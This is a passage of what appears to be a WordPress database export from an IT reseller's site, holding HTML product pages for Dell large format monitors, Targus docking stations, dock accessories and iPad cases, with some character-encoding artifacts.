vivid visuals.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_05.jpg\" alt=\"Captivate your audience\" width=\"360\" height=\"267\" /></p>		\n			<h2>Dell Large Format Monitors</h2>		\n		https://www.youtube.com/watch?v=Z98yJnbXWq8		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Flexible IT solutions</h2>A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_06.jpg\" alt=\"Flexible IT solutions\" width=\"445\" height=\"351\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_07.jpg\" alt=\"Adapts to business needs. Present and future.\" /></p><h2>Adapts to business needs. Present and future.</h2><ul><li><strong>Solutions that work with you:</strong>Â Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology youâ€™re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can alsoÂ be loaded with your preferred corporate image, so that it adheres to your security and service standards.</li></ul><ul><li><strong>Customized to your needs:</strong>Â Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.</li></ul>		\n		<h2>Easy to deploy. Simple to manage.</h2><ul><li><strong>A smooth deployment:</strong>Â With a few painless steps, and a couple of extra hands, itâ€™s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether thatâ€™s a mobile cart, stand or wall mount.</li><li><strong>Manage your meeting spaces:</strong>Â With RS232 and RJ45<a rel=\"technotes:available-monitors\">*</a>Â interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_08.jpg\" alt=\"Easy to deploy. Simple to manage.\" width=\"355\" height=\"263\" /></p><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_09.jpg\" alt=\"Ultimate management\" width=\"337\" height=\"256\" /></p><h2>Ultimate management</h2><ul><li><strong>Seamless integration for easy access:</strong>Â Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a rel=\"technotes:available-monitors\">*</a>Â without the need for a separate power cord, simplifying access to WiFi, annotationÂ andÂ meeting room management applications.</li><li><strong>Easy to upgrade:</strong>Â Thanks toÂ it\'sÂ modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.</li></ul>		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Solutions you can count on</h2>Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_10.jpg\" alt=\"Solutions you can count on\" width=\"412\" height=\"325\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_11.jpg\" alt=\"Dependable reliability\" /></p><h2>Dependable reliability</h2><strong>Peace of mind comes standard:</strong>Â Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a rel=\"technotes:advanced-exchange-service-monitors\">*</a>Â so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a rel=\"technotes:hardware-warranty-monitors\">*</a>Â up to 5-years for additional support.<br /><br /><strong>Low maintenance. Simple manageability:Â </strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.		\n		<h2 style=\"text-align: center;\">C5519Q</h2><h2 style=\"text-align: center;\">C5518QT</h2><h2 style=\"text-align: center;\">C7017T</h2><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c5519q/global_spi/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\" alt=\"C5519Q Monitor\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c5518qt/pdp/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\" alt=\"Dell Monitor C5518QT\" /></p><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7017t/global_spi/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\" alt=\"Dell 70 (C7017t) Conference Room Monitor\" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />Optional bracket<br />Non-touch<br />54.6 in<br />Vertical Alignment Glass<br />Anti-glare<br />Optional wall mount<br />2x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />54.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>Full HD<br />Optional bracket<br />10 points of touch<br />69.5 in<br />Vertical Alignment Glass<br />Anti-glare, Anti-smudge<br />Wall mount included<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p>Wall mount included</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><h2 style=\"text-align: center;\">C7520QT</h2><h2 style=\"text-align: center;\">C8618QT</h2><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7520qt/global_spi/ng/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\" alt=\"Dell 75 4K Interactive Touch Monitor: C7520QT\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c8618qt/global_spi/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\" alt=\"Dell-C8618QT-Monitor \" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />PC slot<br />20 points of touch<br />75 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />85.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />4x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p>','Dell Large Format Displays','','inherit','closed','closed','','3661-revision-v1','','','2019-10-29 10:20:50','2019-10-29 02:20:50','',3661,'https://bintara.com.my/blog/2019/10/29/3661-revision-v1/',0,'revision','',0),(3679,1,'2019-10-29 10:24:29','2019-10-29 02:24:29','[vfb id=13]','Get Quotation (Dell)','','publish','closed','closed','','get-quotation-dell','','','2019-10-29 10:44:33','2019-10-29 02:44:33','',0,'https://bintara.com.my/?page_id=3679',0,'page','',0),(3680,1,'2019-10-29 10:24:29','2019-10-29 02:24:29','','Get Quotation (Dell)','','inherit','closed','closed','','3679-revision-v1','','','2019-10-29 10:24:29','2019-10-29 02:24:29','',3679,'https://bintara.com.my/blog/2019/10/29/3679-revision-v1/',0,'revision','',0),(3681,1,'2019-10-29 10:44:25','2019-10-29 02:44:25','[vfb id=4]','Get Quotation (Dell)','','inherit','closed','closed','','3679-autosave-v1','','','2019-10-29 10:44:25','2019-10-29 02:44:25','',3679,'https://bintara.com.my/blog/2019/10/29/3679-autosave-v1/',0,'revision','',0),(3682,1,'2019-10-29 10:44:33','2019-10-29 02:44:33','[vfb id=13]','Get Quotation (Dell)','','inherit','closed','closed','','3679-revision-v1','','','2019-10-29 10:44:33','2019-10-29 02:44:33','',3679,'https://bintara.com.my/blog/2019/10/29/3679-revision-v1/',0,'revision','',0),(3683,1,'2019-10-31 08:46:16','2019-10-31 00:46:16','Docking Stations, Docking Accessories, Tablet Cases & Privacy Screens <a href=\"https://bintara.com.my/targus\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2019/10/Targus.png\" alt=\"\" width=\"1024\" height=\"681\" />','Targus','','publish','closed','closed','','targus','','','2019-11-05 11:59:25','2019-11-05 03:59:25','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=3683',0,'portfolio','',0),(3691,1,'2019-11-05 08:38:51','2019-11-05 00:38:51','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward 